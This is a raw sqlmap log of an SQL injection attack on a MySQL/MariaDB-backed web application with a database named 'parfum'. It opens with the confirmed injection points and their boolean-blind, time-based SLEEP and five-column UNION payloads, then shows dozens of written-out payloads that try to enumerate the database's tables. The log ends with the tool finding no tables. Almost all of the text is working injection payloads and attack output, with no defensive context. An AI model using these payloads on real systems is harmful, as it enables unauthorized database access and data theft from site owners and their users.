Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://' AND 7389=7389-- qoxM
Vector: AND [INFERENCE]
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://' AND (SELECT 9965 FRO
M (SELECT(SLEEP(5)))umCy)-- CigK
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE]
,0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: http://:80/blog/category/-2990' UNION ALL SELECT NULL
,NULL,NULL,NULL,CONCAT(0x716a707171,0x565a7070474f77495945716a52566b686252457372
674b776e694f6f6877554c4b564f4b6a4c464a,0x716a7a7071)-- -
Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY]-- -
---
[06:15:30] [INFO] testing MySQL
[06:15:30] [DEBUG] performed 0 queries in 0.02 seconds
[06:15:30] [INFO] confirming MySQL
[06:15:30] [DEBUG] performed 0 queries in 0.00 seconds
[06:15:30] [PAYLOAD] -8917' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,(CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END),0x716a7a707
1)-- -
[06:15:32] [DEBUG] turning off NATIONAL CHARACTER casting
[06:15:32] [PAYLOAD] -8379' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,(CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END),0x716a7a707
1)-- -
[06:15:34] [DEBUG] performed 2 queries in 4.32 seconds
[06:15:34] [DEBUG] performed 0 queries in 0.01 seconds
[06:15:34] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[06:15:34] [INFO] fetching tables for database: 'DB'
[06:15:34] [PAYLOAD] -9852' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,JSON_ARRAYAGG(CONCAT_WS(0x6f6b6c6a646f,table_name)),0x716a7a7071) FROM INFO
RMATION_SCHEMA.TABLES WHERE table_schema IN (0x70617266756d)-- -
[06:15:37] [PAYLOAD] -6604' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x716a7a7071) FROM INFORMATION
_SCHEMA.TABLES WHERE table_schema IN (0x70617266756d)-- -
[06:15:40] [WARNING] the SQL query provided does not return any output
[06:15:40] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[06:15:40] [PAYLOAD] -6180' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,JSON_ARRAYAGG(CONCAT_WS(0x6f6b6c6a646f,table_name)),0x716a7a7071) FROM mysq
l.innodb_table_stats WHERE database_name IN (0x70617266756d)-- -
[06:15:43] [PAYLOAD] -8023' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x716a7a7071) FROM mysql.innod
b_table_stats WHERE database_name IN (0x70617266756d)-- -
[06:15:45] [WARNING] the SQL query provided does not return any output
[06:15:45] [INFO] fetching number of tables for database 'DB'
[06:15:45] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
1,1))>51-- ZVRv
[06:15:48] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
1,1))>48-- ZVRv
[06:15:51] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
1,1))>9-- ZVRv
[06:15:52] [INFO] retrieved:
[06:15:52] [DEBUG] performed 3 queries in 6.77 seconds
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N
[06:15:52] [DEBUG] used the default behavior, running in batch mode
[06:15:52] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
ES WHERE table_schema=0x70617266756d),1,1))>51,0,5)))))HoOT)-- oDuA
[06:15:52] [WARNING] time-based comparison requires larger statistical model, please wait..................... (done)
[06:16:00] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[06:16:01] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
ES WHERE table_schema=0x70617266756d),1,1))>48,0,5)))))HoOT)-- oDuA
[06:16:01] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[06:16:02] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
ES WHERE table_schema=0x70617266756d),1,1))>9,0,5)))))HoOT)-- oDuA
[06:16:03] [INFO] retrieved:
[06:16:03] [DEBUG] performed 3 queries in 11.19 seconds
[06:16:03] [WARNING] unable to retrieve the number of tables for database 'parfum'
[06:16:03] [INFO] fetching number of tables for database 'DB'
[06:16:03] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
1,1))>51-- LERK
[06:16:05] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
1,1))>48-- LERK
[06:16:06] [DEBUG] turning off reflection removal mechanism (for optimization purposes)
[06:16:06] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
1,1))>9-- LERK
[06:16:07] [INFO] retrieved:
[06:16:07] [DEBUG] performed 3 queries in 3.66 seconds
[06:16:07] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
s WHERE database_name=0x70617266756d),1,1))>51,0,5)))))FEKR)-- xICj
[06:16:08] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
s WHERE database_name=0x70617266756d),1,1))>48,0,5)))))FEKR)-- xICj
[06:16:09] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
s WHERE database_name=0x70617266756d),1,1))>9,0,5)))))FEKR)-- xICj
[06:16:10] [INFO] retrieved:
[06:16:10] [DEBUG] performed 3 queries in 3.23 seconds
[06:16:10] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] N
[06:16:10] [DEBUG] used the default behavior, running in batch mode
No tables found